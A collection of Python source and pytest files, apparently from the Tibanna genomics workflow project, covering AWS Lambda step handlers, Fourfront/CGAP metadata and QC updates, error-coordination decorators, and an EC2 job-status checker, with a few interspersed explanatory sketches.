# eda72adf-3999-4ef4-adf7-58a64a9044d8, eda9be6d-0ecd-4bad-bd07-6e1a7efc98be
# with accessions GAPFIQNHLO6D and GAPFIZ25WPXE
# on cgapwolf
# with extra files with format rck_gz_tbi and status uploaded
# the format and status of these file items should be rck_gz and uploaded as well.
input_file_list = [
{
"bucket_name": "bucket1",
"workflow_argument_name": "input_rcks",
"uuid": ["eda72adf-3999-4ef4-adf7-58a64a9044d8", "eda9be6d-0ecd-4bad-bd07-6e1a7efc98be"],
"object_key": ["<KEY>", "<KEY>"],
"rename": ["haha.rck.gz", "lala.rck.gz"]
}
]
_tibanna = {'env': 'fourfront-cgapwolf',
'settings': {'1': '1'}}
inp = ZebraInput(workflow_uuid='a',
config={'log_bucket': 'b'},
output_bucket='c',
input_files=input_file_list,
_tibanna=_tibanna)
args = dict()
args['input_files'] = inp.input_files.create_unicorn_arg_input_files()
args['secondary_files'] = inp.input_files.create_unicorn_arg_secondary_files()
assert 'input_rcks' in args['secondary_files']
assert 'rename' in args['secondary_files']['input_rcks']
assert len(args['secondary_files']['input_rcks']['rename']) == 2
assert args['secondary_files']['input_rcks']['rename'][0] == ['haha.rck.gz.tbi']
assert args['secondary_files']['input_rcks']['rename'][1] == ['lala.rck.gz.tbi']
@valid_env
def test_fourfront_starter2(start_run_event_bwa_check):
starter = FourfrontStarter(**start_run_event_bwa_check)
assert starter
assert not starter.user_supplied_output_files('raw_bam')
assert len(starter.output_argnames) == 2
assert starter.output_argnames[0] == 'raw_bam'
assert starter.arg('raw_bam')['argument_type'] == 'Output processed file'
assert starter.pf('raw_bam')
starter.create_pfs()
assert len(starter.pfs) == 1
@valid_env
def test_fourfront_starter_custom_qc(start_run_event_vcfqc):
starter = FourfrontStarter(**start_run_event_vcfqc)
assert starter
outjson = starter.inp.as_dict()
assert 'custom_qc_fields' in outjson
assert 'filtering_condition' in outjson['custom_qc_fields']
@valid_env
def test_bamcheck(update_ffmeta_event_data_bamcheck):
updater = FourfrontUpdater(**update_ffmeta_event_data_bamcheck)
updater.update_qc()
target_accession = updater.accessions('raw_bam')[0]
assert target_accession == '4DNFIWT3X5RU'
assert updater.post_items
assert len(updater.post_items['quality_metric_bamcheck']) == 1
uuid = list(updater.post_items['quality_metric_bamcheck'].keys())[0]
assert 'quickcheck' in updater.post_items['quality_metric_bamcheck'][uuid]
@valid_env
def test_cmphet(update_ffmeta_event_data_cmphet):
updater = FourfrontUpdater(**update_ffmeta_event_data_cmphet)
fake_parsed_qc_json = {"by_genes":[{"name": "ENSG00000007047"}]}
fake_parsed_qc_table = {"check": "OK"}
updater._metadata["GAPFI6IZ585N"] = {"accession": "GAPFI6IZ585N"} # no quality_metric field
with mock.patch("tibanna_ffcommon.qc.read_s3_data"):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_json", return_value=fake_parsed_qc_json):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_table", return_value=fake_parsed_qc_table):
updater.update_qc()
assert updater.post_items
assert 'quality_metric_qclist' in updater.post_items
assert 'quality_metric_cmphet' in updater.post_items
assert 'quality_metric_vcfcheck' in updater.post_items
logger.debug("post_items[quality_metric_qclist]=" + str(updater.post_items['quality_metric_qclist']))
qclist_uuid = list(updater.post_items['quality_metric_qclist'].keys())[0]
assert 'qc_list' in updater.post_items['quality_metric_qclist'][qclist_uuid]
assert len(updater.post_items['quality_metric_qclist'][qclist_uuid]['qc_list']) == 2
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['project'] == DEFAULT_PROJECT
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['institution'] == DEFAULT_INSTITUTION
@valid_env
def test_cmphet_custom_qc_fields(update_ffmeta_event_data_cmphet):
update_ffmeta_event_data_cmphet['custom_qc_fields'] = {
'project': '/projects/test/',
'institution': '/institutions/test/'
}
updater = FourfrontUpdater(**update_ffmeta_event_data_cmphet)
fake_parsed_qc_json = {"by_genes":[{"name": "ENSG00000007047"}]}
fake_parsed_qc_table = {"check": "OK"}
updater._metadata["GAPFI6IZ585N"] = {"accession": "GAPFI6IZ585N"} # no quality_metric field
with mock.patch("tibanna_ffcommon.qc.read_s3_data"):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_json", return_value=fake_parsed_qc_json):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_table", return_value=fake_parsed_qc_table):
updater.update_qc()
assert updater.post_items
assert 'quality_metric_qclist' in updater.post_items
assert 'quality_metric_cmphet' in updater.post_items
assert 'quality_metric_vcfcheck' in updater.post_items
logger.debug("post_items[quality_metric_qclist]=" + str(updater.post_items['quality_metric_qclist']))
qclist_uuid = list(updater.post_items['quality_metric_qclist'].keys())[0]
assert 'qc_list' in updater.post_items['quality_metric_qclist'][qclist_uuid]
assert len(updater.post_items['quality_metric_qclist'][qclist_uuid]['qc_list']) == 2
# custom_qc_fields does not apply to qclist
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['project'] == DEFAULT_PROJECT
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['institution'] == DEFAULT_INSTITUTION
qc_cmphet_uuid = list(updater.post_items['quality_metric_cmphet'].keys())[0]
qc_vcfcheck_uuid = list(updater.post_items['quality_metric_vcfcheck'].keys())[0]
assert updater.post_items['quality_metric_cmphet'][qc_cmphet_uuid]['project'] == "/projects/test/"
assert updater.post_items['quality_metric_cmphet'][qc_cmphet_uuid]['institution'] == "/institutions/test/"
assert updater.post_items['quality_metric_vcfcheck'][qc_vcfcheck_uuid]['project'] == "/projects/test/"
assert updater.post_items['quality_metric_vcfcheck'][qc_vcfcheck_uuid]['institution'] == "/institutions/test/"
@valid_env
def test_cmphet_common_fields(update_ffmeta_event_data_cmphet):
update_ffmeta_event_data_cmphet['common_fields'] = {
'project': '/projects/test/',
'institution': '/institutions/test/'
}
updater = FourfrontUpdater(**update_ffmeta_event_data_cmphet)
fake_parsed_qc_json = {"by_genes":[{"name": "ENSG00000007047"}]}
fake_parsed_qc_table = {"check": "OK"}
updater._metadata["GAPFI6IZ585N"] = {"accession": "GAPFI6IZ585N"} # no quality_metric field
with mock.patch("tibanna_ffcommon.qc.read_s3_data"):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_json", return_value=fake_parsed_qc_json):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_table", return_value=fake_parsed_qc_table):
updater.update_qc()
assert updater.post_items
assert 'quality_metric_qclist' in updater.post_items
assert 'quality_metric_cmphet' in updater.post_items
assert 'quality_metric_vcfcheck' in updater.post_items
logger.debug("post_items[quality_metric_qclist]=" + str(updater.post_items['quality_metric_qclist']))
qclist_uuid = list(updater.post_items['quality_metric_qclist'].keys())[0]
assert 'qc_list' in updater.post_items['quality_metric_qclist'][qclist_uuid]
assert len(updater.post_items['quality_metric_qclist'][qclist_uuid]['qc_list']) == 2
# common fields do apply to qclist
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['project'] == "/projects/test/"
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['institution'] == "/institutions/test/"
qc_cmphet_uuid = list(updater.post_items['quality_metric_cmphet'].keys())[0]
qc_vcfcheck_uuid = list(updater.post_items['quality_metric_vcfcheck'].keys())[0]
assert updater.post_items['quality_metric_cmphet'][qc_cmphet_uuid]['project'] == "/projects/test/"
assert updater.post_items['quality_metric_cmphet'][qc_cmphet_uuid]['institution'] == "/institutions/test/"
assert updater.post_items['quality_metric_vcfcheck'][qc_vcfcheck_uuid]['project'] == "/projects/test/"
assert updater.post_items['quality_metric_vcfcheck'][qc_vcfcheck_uuid]['institution'] == "/institutions/test/"
@valid_env
def test_md5_common_fields(start_run_event_md5):
start_run_event_md5['common_fields'] = {
'project': '/projects/test/',
'institution': '/institutions/test/'
}
starter = FourfrontStarter(**start_run_event_md5)
# common fields apply to wfr (ff)
starter.create_ff()
assert starter.ff.project == '/projects/test/'
assert starter.ff.institution == '/institutions/test/'
@valid_env
def test_md5_wfr_meta_common_fields(start_run_event_md5):
start_run_event_md5['common_fields'] = {
'project': '/projects/test/',
'institution': '/institutions/test/'
}
start_run_event_md5['wfr_meta'] = {
'project': '/projects/test2/',
'institution': '/institutions/test2/'
}
starter = FourfrontStarter(**start_run_event_md5)
# common fields apply to wfr (ff)
starter.create_ff()
assert starter.ff.project == '/projects/test2/' # wfr_meta overwrites common_fields
assert starter.ff.institution == '/institutions/test2/' # wfr_meta overwrites common_fields
```
#### File: tibanna_ff/tibanna_4dn/core.py
```python
from tibanna_ffcommon.core import API as _API
from .stepfunction import StepFunctionPony
from .stepfunction_cost_updater import StepFunctionCostUpdater
from .vars import (
TIBANNA_DEFAULT_STEP_FUNCTION_NAME,
LAMBDA_TYPE,
IAM_BUCKETS,
DEV_ENV,
PROD_ENV
)
class API(_API):
# This one cannot be imported in advance, because it causes circular import.
# lambdas run_workflow / validate_md5_s3_initiator needs to import this API
# to call run_workflow
@property
def lambdas_module(self):
from . import lambdas as pony_lambdas
return pony_lambdas
@property
def tibanna_packages(self):
import tibanna
import tibanna_ffcommon
import tibanna_4dn
return [tibanna, tibanna_ffcommon, tibanna_4dn]
StepFunction = StepFunctionPony
StepFunctionCU = StepFunctionCostUpdater
default_stepfunction_name = TIBANNA_DEFAULT_STEP_FUNCTION_NAME
default_env = DEV_ENV
sfn_type = LAMBDA_TYPE
lambda_type = LAMBDA_TYPE
@property
def IAM(self):
from .iam_utils import IAM
return IAM
def __init__(self):
pass
def deploy_core(self, name, suffix=None, usergroup='', subnets=None, security_groups=None,
env=None, quiet=False):
if env:
usergroup = env + '_' + usergroup if usergroup else env
else:
if usergroup:
env = DEV_ENV
else:
env = PROD_ENV
super().deploy_core(name=name, suffix=suffix, usergroup=usergroup, subnets=subnets,
security_groups=security_groups, quiet=quiet)
def deploy_pony(self, suffix=None, usergroup='', subnets=None, security_groups=None, env=None, deploy_costupdater=True):
if env:
usergroup = env + '_' + usergroup if usergroup else env
else:
if usergroup:
env = DEV_ENV
else:
env = PROD_ENV
self.deploy_tibanna(suffix=suffix, usergroup=usergroup, setup=True, default_usergroup_tag='',
do_not_delete_public_access_block=True, no_randomize=True,
buckets=','.join(IAM_BUCKETS(env)), deploy_costupdater=deploy_costupdater,
subnets=subnets, security_groups=security_groups)
```
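Both `deploy_core` and `deploy_pony` above share the same env/usergroup resolution: an explicit `env` is prefixed onto the usergroup, otherwise the env falls back to `DEV_ENV` when a usergroup is given and `PROD_ENV` when it is not. A small sketch of just that branching (the env constants are stand-ins for the real values in `tibanna_4dn.vars`):
```python
# Mirror of the env/usergroup branching in deploy_core/deploy_pony.
# "<DEV_ENV>"/"<PROD_ENV>" are placeholders for the constants imported from .vars.
def resolve_usergroup(env=None, usergroup='', dev_env='<DEV_ENV>', prod_env='<PROD_ENV>'):
    if env:
        usergroup = env + '_' + usergroup if usergroup else env
    else:
        env = dev_env if usergroup else prod_env
    return env, usergroup

print(resolve_usergroup(env='someenv', usergroup='mygroup'))  # ('someenv', 'someenv_mygroup')
print(resolve_usergroup(usergroup='mygroup'))                 # ('<DEV_ENV>', 'mygroup')
print(resolve_usergroup())                                    # ('<PROD_ENV>', '')
```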
#### File: tibanna_ff/tibanna_4dn/update_ffmeta.py
```python
import copy
from .pony_utils import FourfrontUpdater
from tibanna import create_logger
logger = create_logger(__name__)
def update_ffmeta(input_json):
"""Check output and update fourfront metadata"""
input_json_copy = copy.deepcopy(input_json)
# metadata-only info may be in 'metadata_only' or in 'config'->'runmode'->'metadata_only'
# if metadata_only is True, that means the job did not actually run - we're creating/updating metadata
# as if the job has run.
if not input_json_copy.get('metadata_only', False):
input_json_copy['metadata_only'] = input_json_copy['config'].get('runmode', {}).get('metadata_only', False)
# actual metadata update
logger.info("creating FourfrontUpdater object")
try:
updater = FourfrontUpdater(**input_json_copy)
except Exception as e:
logger.error("error creating FourfrontUpdater: %s" % str(e))
raise e
logger.info("checking error")
if input_json_copy.get('error', False):
logger.info("got error from earlier step, calling handle_error")
updater.handle_error(input_json_copy['error'])
try:
updater.update_metadata()
except Exception as e:
updater.handle_error(str(e))
# lambda output
input_json_copy['ff_meta'] = updater.ff_meta.as_dict()
input_json_copy['pf_meta'] = [v.as_dict() for _, v in updater.pf_output_files.items()]
return input_json_copy
```
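As the comments in `update_ffmeta()` above note, the metadata-only flag may arrive either at the top level of the input json or nested under `config.runmode`. A tiny sketch of that resolution with made-up inputs:
```python
# Illustration of how update_ffmeta() resolves metadata_only; the dicts are made-up examples.
def resolve_metadata_only(input_json):
    if not input_json.get('metadata_only', False):
        return input_json['config'].get('runmode', {}).get('metadata_only', False)
    return True

print(resolve_metadata_only({'metadata_only': True, 'config': {}}))             # True
print(resolve_metadata_only({'config': {'runmode': {'metadata_only': True}}}))  # True
print(resolve_metadata_only({'config': {}}))                                    # False
```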
#### File: tibanna_cgap/lambdas/start_run.py
```python
from tibanna_ffcommon.exceptions import exception_coordinator
from tibanna_cgap.start_run import start_run
from tibanna_cgap.vars import AWS_REGION, LAMBDA_TYPE
config = {
'function_name': 'start_run_' + LAMBDA_TYPE,
'function_module': 'service',
'function_handler': 'handler',
'handler': 'service.handler',
'region': AWS_REGION,
'runtime': 'python3.6',
'role': 'lambda_full_s3',
'description': 'Tibanna zebra start_run',
'timeout': 300,
'memory_size': 256
}
def metadata_only(event):
# this relies on the fact that the event contains an output_files key with output files
assert event['metadata_only']
assert event['output_files']
return real_handler(event, None)
@exception_coordinator('start_run', metadata_only)
def handler(event, context):
if event.get('push_error_to_end', True):
event['push_error_to_end'] = True # push error to end by default for zebra
return real_handler(event, context)
def real_handler(event, context):
return start_run(event)
```
#### File: tibanna_cgap/lambdas/update_cost.py
```python
from tibanna.lambdas import update_cost_awsem as update_cost
from tibanna.lambdas.update_cost_awsem import config
from tibanna_ffcommon.exceptions import exception_coordinator
from tibanna_cgap.vars import LAMBDA_TYPE
config['function_name'] = 'update_cost_' + LAMBDA_TYPE
def handler(event, context):
return update_cost(event)
```
#### File: tibanna_ff/tibanna_cgap/start_run.py
```python
import boto3
import json
from .zebra_utils import FourfrontStarter
from tibanna import create_logger
logger = create_logger(__name__)
def start_run(input_json):
'''
This is a generic function to run an awsem workflow
based on the data passed in
workflow_uuid : for now, pass this on. Later we can add a code to automatically retrieve this from app_name.
Note multiple workflow_uuids can be available for an app_name
(different versions of the same app could have a different uuid)
'''
starter = FourfrontStarter(**input_json)
logger.debug("starter.inp.as_dict() = " + str(starter.inp.as_dict()))
if starter.inp.config.log_bucket and starter.inp.jobid:
s3 = boto3.client('s3')
s3.put_object(Body=json.dumps(input_json, indent=4).encode('ascii'),
Key=starter.inp.jobid + '.input.json',
Bucket=starter.inp.config.log_bucket)
starter.run()
return(starter.inp.as_dict())
```
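A hedged example of the kind of input json `start_run()` above consumes; every value is a placeholder, and only the field names are taken from the code and tests elsewhere in this repo (`workflow_uuid`, `config.log_bucket`, `input_files`, `_tibanna`).
```python
# Placeholder values throughout; only the field names come from the surrounding source.
example_input_json = {
    "workflow_uuid": "<workflow-uuid>",
    "output_bucket": "<output-bucket>",
    "config": {"log_bucket": "<log-bucket>"},
    "input_files": [
        {"workflow_argument_name": "input_rcks",
         "uuid": ["<file-uuid-1>", "<file-uuid-2>"]},
    ],
    "_tibanna": {"env": "fourfront-cgapwolf", "settings": {}},
}
# start_run(example_input_json) would build a FourfrontStarter, write this json to
# "<jobid>.input.json" in the log bucket, and then kick off the AWSEM run.
```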
#### File: tibanna_ff/tibanna_cgap/stepfunction.py
```python
from .vars import LAMBDA_TYPE
from tibanna_ffcommon.stepfunction import StepFunctionFFAbstract
class StepFunctionZebra(StepFunctionFFAbstract):
@property
def lambda_type(self):
return LAMBDA_TYPE
@property
def iam(self):
from .iam_utils import IAM
return IAM(self.usergroup)
```
#### File: tibanna_ff/tibanna_ffcommon/exceptions.py
```python
from tibanna import create_logger
from tibanna.exceptions import *
import traceback
logger = create_logger(__name__)
class TibannaStartException(Exception):
"""Error connecting to get the access key from s3"""
pass
class FdnConnectionException(Exception):
"""There is an error connecting to the 4DN portal"""
pass
class MalFormattedFFInputException(Exception):
"""There is an error with pony/zebra input json format"""
pass
class MalFormattedWorkflowMetadataException(Exception):
"""There is an error with pony/zebra workflow metadata"""
pass
def exception_coordinator(lambda_name, metadata_only_func):
'''
friendly wrapper for your lambda functions, based on input_json / event coming in...
1. Logs basic input for all functions
2. if 'skip' key == 'lambda_name', skip the function
3. catch exceptions raised by the lambda, and if not in the list of ignored exceptions, add
the exception to output json
4. 'metadata_only' parameter, if set to true, just create metadata instead of running the workflow
'''
def decorator(function):
ignored_exceptions = [EC2StartingException, StillRunningException,
TibannaStartException, FdnConnectionException,
DependencyStillRunningException, EC2InstanceLimitWaitException]
def wrapper(event, context):
if context:
logger.info("context= " + str(context))
logger.info(event)
if lambda_name in event.get('skip', []):
logger.info('skipping %s since skip was set in input_json' % lambda_name)
return event
elif event.get('push_error_to_end', False) and event.get('error', False) \
and lambda_name != 'update_ffmeta':
logger.info('skipping %s since a value for "error" is in input json '
'and lambda is not update_ffmeta' % lambda_name)
return event
elif event.get('metadata_only', False):
return metadata_only_func(event)
# else
try:
return function(event, context)
except Exception as e:
if type(e) in ignored_exceptions:
raise e
# update ff_meta to error status
elif lambda_name == 'update_ffmeta':
# for the last step, just raise the error
if 'error' in event:
error_msg = "error from earlier step: %s" % event["error"]
else:
error_msg = "error from update_ffmeta: %s." % str(e) + \
"Full traceback: %s" % traceback.format_exc()
raise Exception(error_msg)
elif not event.get('push_error_to_end', False):
raise e
# else
if e.__class__ == AWSEMJobErrorException:
error_msg = 'Error on step: %s: %s' % (lambda_name, str(e))
elif e.__class__ == EC2UnintendedTerminationException:
error_msg = 'EC2 unintended termination error on step: %s: %s' % (lambda_name, str(e))
elif e.__class__ == EC2IdleException:
error_msg = 'EC2 Idle error on step: %s: %s' % (lambda_name, str(e))
elif e.__class__ == JobAbortedException:
error_msg = 'Job Aborted'
else:
error_msg = 'Error on step: %s. Full traceback: %s' % (lambda_name, traceback.format_exc())
event['error'] = error_msg
logger.info(error_msg)
return event
return wrapper
return decorator
```
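A compact, hedged sketch of wiring `exception_coordinator` onto a step lambda; `my_step` is an illustrative name, and a `mock.Mock()` stands in for the metadata-only handler exactly as in the tests above.
```python
# Minimal usage sketch of exception_coordinator; names here are illustrative only.
from unittest import mock
from tibanna_ffcommon.exceptions import exception_coordinator

@exception_coordinator('my_step', mock.Mock())   # second arg: metadata-only handler
def my_step(event, context):
    raise RuntimeError("something went wrong inside the step")

# With push_error_to_end the exception is folded into the returned event instead of
# being raised, so the step function can carry it forward to update_ffmeta.
out = my_step({'push_error_to_end': True}, None)
assert 'Error on step: my_step' in out['error']

# Without push_error_to_end the exception propagates as usual:
# my_step({}, None)  # would raise RuntimeError
```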
#### File: tibanna_ff/tibanna_ffcommon/file_format.py
```python
from dcicutils.ff_utils import (
search_metadata,
)
from tibanna import create_logger
logger = create_logger(__name__)
class FormatExtensionMap(object):
def __init__(self, ff_keys=None, ffe_all=None):
"""connect to the server and get all fileformat search result if ff_keys
if given. If not, use user-specified ffe_all
"""
if not ff_keys and not ffe_all:
raise Exception("Either ff_keys or ffe_all must be specified" + \
"to create a FormatExtensionMap object")
if ff_keys and ffe_all:
raise Exception("Either ff_keys or ffe_all must be specified but not both" + \
"to create a FormatExtensionMap object")
if ff_keys and not ffe_all:
try:
logger.debug("Searching in server : " + ff_keys['server'])
ffe_all = search_metadata("/search/?type=FileFormat&frame=object", key=ff_keys)
except Exception as e:
raise Exception("Can't get the list of FileFormat objects. %s\n" % e)
self.fe_dict = dict()
logger.debug("**ffe_all = " + str(ffe_all))
for k in ffe_all:
file_format = k['file_format']
self.fe_dict[file_format] = \
{'standard_extension': k['standard_file_extension'],
'other_allowed_extensions': k.get('other_allowed_extensions', []),
'extrafile_formats': k.get('extrafile_formats', [])
}
def get_extension(self, file_format):
if file_format in self.fe_dict:
return self.fe_dict[file_format]['standard_extension']
else:
return None
def get_other_extensions(self, file_format):
if file_format in self.fe_dict:
return self.fe_dict[file_format]['other_allowed_extensions']
else:
return []
def parse_formatstr(file_format_str):
if not file_format_str:
return None
return file_format_str.replace('/file-formats/', '').replace('/', '')
def cmp_fileformat(format1, format2):
return parse_formatstr(format1) == parse_formatstr(format2)
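# Illustrative usage sketch (not part of the original module): a FormatExtensionMap
# can be built offline from a hand-made ffe_all list instead of querying the portal.
if __name__ == '__main__':
    _ffe_all = [{'file_format': 'bam',
                 'standard_file_extension': 'bam',
                 'other_allowed_extensions': [],
                 'extrafile_formats': []}]
    _fem = FormatExtensionMap(ffe_all=_ffe_all)
    assert _fem.get_extension('bam') == 'bam'
    assert _fem.get_other_extensions('bam') == []
    assert cmp_fileformat('/file-formats/bam/', 'bam')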
``` |
{
"source": "4dn-dcic/tibanna",
"score": 2
} |
#### File: unicorn/check_task_awsem/test_handler.py
```python
from tibanna.lambdas import check_task_awsem as service
from tibanna.exceptions import (
EC2StartingException,
StillRunningException,
MetricRetrievalException,
EC2IdleException,
JobAbortedException
)
import pytest
import boto3
import random
import string
import json
from datetime import datetime, timedelta
from dateutil.tz import tzutc
from tibanna.vars import AWSEM_TIME_STAMP_FORMAT
@pytest.fixture()
def check_task_input():
return {"config": {"log_bucket": "tibanna-output"},
"jobid": "test_job",
"push_error_to_end": True
}
@pytest.fixture()
def s3(check_task_input):
bucket_name = check_task_input['config']['log_bucket']
return boto3.resource('s3').Bucket(bucket_name)
@pytest.mark.webtest
def test_check_task_awsem_fails_if_no_job_started(check_task_input, s3):
# ensure there is no job started
jobid = 'notmyjobid'
check_task_input_modified = check_task_input
check_task_input_modified['jobid'] = jobid
check_task_input_modified['config']['start_time'] = datetime.strftime(datetime.now(tzutc()) - timedelta(minutes=4),
AWSEM_TIME_STAMP_FORMAT)
job_started = "%s.job_started" % jobid
s3.delete_objects(Delete={'Objects': [{'Key': job_started}]})
with pytest.raises(EC2StartingException) as excinfo:
service.handler(check_task_input_modified, '')
assert 'Failed to find jobid' in str(excinfo.value)
@pytest.mark.webtest
def test_check_task_awsem_fails_if_no_job_started_for_too_long(check_task_input, s3):
# ensure there is no job started
jobid = 'notmyjobid'
check_task_input_modified = check_task_input
check_task_input_modified['jobid'] = jobid
check_task_input_modified['config']['start_time'] = datetime.strftime(datetime.now(tzutc()) - timedelta(minutes=13),
AWSEM_TIME_STAMP_FORMAT)
job_started = "%s.job_started" % jobid
s3.delete_objects(Delete={'Objects': [{'Key': job_started}]})
with pytest.raises(EC2IdleException) as excinfo:
service.handler(check_task_input_modified, '')
assert 'Failed to find jobid' in str(excinfo.value)
def test_check_task_awsem_aborted(check_task_input, s3):
jobid = 'l<PASSWORD>'
check_task_input_modified = check_task_input
check_task_input_modified['jobid'] = jobid
job_started = "%s.job_started" % jobid
job_aborted = "%s.aborted" % jobid
s3.put_object(Body=b'', Key=job_started)
s3.put_object(Body=b'', Key=job_aborted)
with pytest.raises(JobAbortedException) as excinfo:
service.handler(check_task_input, '')
assert 'aborted' in str(excinfo.value)
# cleanup
s3.delete_objects(Delete={'Objects': [{'Key': job_started}]})
s3.delete_objects(Delete={'Objects': [{'Key': job_aborted}]})
@pytest.mark.webtest
def test_check_task_awsem_throws_exception_if_not_done(check_task_input):
with pytest.raises(StillRunningException) as excinfo:
service.handler(check_task_input, '')
assert 'still running' in str(excinfo.value)
assert 'error' not in check_task_input
@pytest.mark.webtest
def test_check_task_awsem(check_task_input, s3):
jobid = 'l<PASSWORD>'
check_task_input_modified = check_task_input
check_task_input_modified['jobid'] = jobid
job_started = "%s.job_started" % jobid
s3.put_object(Body=b'', Key=job_started)
job_success = "%s.success" % jobid
s3.put_object(Body=b'', Key=job_success)
postrunjson = "%s.postrun.json" % jobid
jsondict = {"config": {"log_bucket": "somelogbucket"},
"Job": {"JOBID": jobid, "start_time": '20190814-21:01:07-UTC',
"App": {}, "Output": {},
"Input": {'Input_files_data': {}, 'Input_parameters': {}, 'Secondary_files_data': {}}}}
jsoncontent = json.dumps(jsondict)
s3.put_object(Body=jsoncontent.encode(), Key=postrunjson)
with pytest.raises(MetricRetrievalException) as excinfo:
retval = service.handler(check_task_input_modified, '')
assert 'error getting metrics' in str(excinfo.value)
s3.delete_objects(Delete={'Objects': [{'Key': job_started}]})
s3.delete_objects(Delete={'Objects': [{'Key': job_success}]})
s3.delete_objects(Delete={'Objects': [{'Key': postrunjson}]})
#assert 'postrunjson' in retval
#assert retval['postrunjson'] == jsondict
#del retval['postrunjson']
#assert retval == check_task_input_modified
@pytest.mark.webtest
def test_check_task_awsem_with_long_postrunjson(check_task_input, s3):
jobid = 'some_uniq_jobid'
check_task_input_modified = check_task_input
check_task_input_modified['jobid'] = jobid
job_started = "%s.job_started" % jobid
s3.put_object(Body=b'', Key=job_started)
job_success = "%s.success" % jobid
s3.put_object(Body=b'', Key=job_success)
postrunjson = "%s.postrun.json" % jobid
verylongstring = ''.join(random.choice(string.ascii_uppercase) for _ in range(50000))
jsondict = {"config": {"log_bucket": "somelogbucket"},
"Job": {"JOBID": jobid, "start_time": '20190814-21:01:07-UTC',
"App": {}, "Output": {},
"Input": {'Input_files_data': {}, 'Input_parameters': {}, 'Secondary_files_data': {}}},
"commands": verylongstring}
jsoncontent = json.dumps(jsondict)
s3.put_object(Body=jsoncontent.encode(), Key=postrunjson)
with pytest.raises(MetricRetrievalException) as excinfo:
retval = service.handler(check_task_input_modified, '')
assert 'error getting metrics' in str(excinfo.value)
s3.delete_objects(Delete={'Objects': [{'Key': job_started}]})
s3.delete_objects(Delete={'Objects': [{'Key': job_success}]})
s3.delete_objects(Delete={'Objects': [{'Key': postrunjson}]})
#assert 'postrunjson' in retval
#assert 'Job' in retval['postrunjson']
#assert 'Output' in retval['postrunjson']['Job']
#assert 'log' in retval['postrunjson']
#assert retval['postrunjson']['log'] == "postrun json not included due to data size limit"
#del retval['postrunjson']
#assert retval == check_task_input_modified
```
#### File: tibanna/tibanna/check_task.py
```python
import boto3
import json
import copy
from . import create_logger
from .cw_utils import TibannaResource
from datetime import datetime, timedelta
from dateutil.tz import tzutc
from .utils import (
does_key_exist,
read_s3
)
from .awsem import (
AwsemPostRunJson
)
from .exceptions import (
StillRunningException,
EC2StartingException,
AWSEMJobErrorException,
EC2UnintendedTerminationException,
EC2IdleException,
MetricRetrievalException,
JobAbortedException,
AWSEMErrorHandler
)
from .vars import PARSE_AWSEM_TIME, AWSEM_TIME_STAMP_FORMAT
from .core import API
RESPONSE_JSON_CONTENT_INCLUSION_LIMIT = 30000 # strictly it is 32,768 but just to be safe.
logger = create_logger(__name__)
def check_task(input_json):
return CheckTask(input_json).run()
class CheckTask(object):
TibannaResource = TibannaResource
API = API
def __init__(self, input_json):
self.input_json = copy.deepcopy(input_json)
def run(self):
# s3 bucket that stores the output
bucket_name = self.input_json['config']['log_bucket']
instance_id = self.input_json['config'].get('instance_id', '')
# info about the jobby job
jobid = self.input_json['jobid']
job_started = "%s.job_started" % jobid
job_success = "%s.success" % jobid
job_error = "%s.error" % jobid
job_aborted = "%s.aborted" % jobid
public_postrun_json = self.input_json['config'].get('public_postrun_json', False)
        # check to ensure this job has started; otherwise fail
if not does_key_exist(bucket_name, job_started):
start_time = PARSE_AWSEM_TIME(self.input_json['config']['start_time'])
now = datetime.now(tzutc())
# terminate the instance if EC2 is not booting for more than 10 min.
if start_time + timedelta(minutes=10) < now:
try:
boto3.client('ec2').terminate_instances(InstanceIds=[instance_id])
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json)
except:
pass # most likely already terminated or never initiated
raise EC2IdleException("Failed to find jobid %s, ec2 is not initializing for too long. Terminating the instance." % jobid)
raise EC2StartingException("Failed to find jobid %s, ec2 is probably still booting" % jobid)
# check to see if job has been aborted (by user or admin)
if does_key_exist(bucket_name, job_aborted):
try:
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json)
except Exception as e:
logger.warning("error occurred while handling postrun json but continuing. %s" % str(e))
raise JobAbortedException("job aborted")
# check to see if job has error, report if so
if does_key_exist(bucket_name, job_error):
try:
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json)
except Exception as e:
logger.warning("error occurred while handling postrun json but continuing. %s" % str(e))
eh = AWSEMErrorHandler()
if 'custom_errors' in self.input_json['args']:
eh.add_custom_errors(self.input_json['args']['custom_errors'])
log = self.API().log(job_id=jobid, logbucket=bucket_name)
ex = eh.parse_log(log)
if ex:
msg_aug = str(ex) + ". For more info - " + eh.general_awsem_check_log_msg(jobid)
raise AWSEMJobErrorException(msg_aug)
else:
raise AWSEMJobErrorException(eh.general_awsem_error_msg(jobid))
# check to see if job has completed
if does_key_exist(bucket_name, job_success):
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json)
print("completed successfully")
return self.input_json
# checking if instance is terminated for no reason
if instance_id: # skip test for instance_id by not giving it to self.input_json
try:
res = boto3.client('ec2').describe_instances(InstanceIds=[instance_id])
except Exception as e:
if 'InvalidInstanceID.NotFound' in str(e):
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json) # We need to record the end time
raise EC2UnintendedTerminationException("EC2 is no longer found for job %s - please rerun." % jobid)
else:
raise e
if not res['Reservations']:
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json) # We need to record the end time
raise EC2UnintendedTerminationException("EC2 is no longer found for job %s - please rerun." % jobid)
else:
ec2_state = res['Reservations'][0]['Instances'][0]['State']['Name']
if ec2_state in ['stopped', 'shutting-down', 'terminated']:
errmsg = "EC2 is terminated unintendedly for job %s - please rerun." % jobid
logger.error(errmsg)
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json) # We need to record the end time
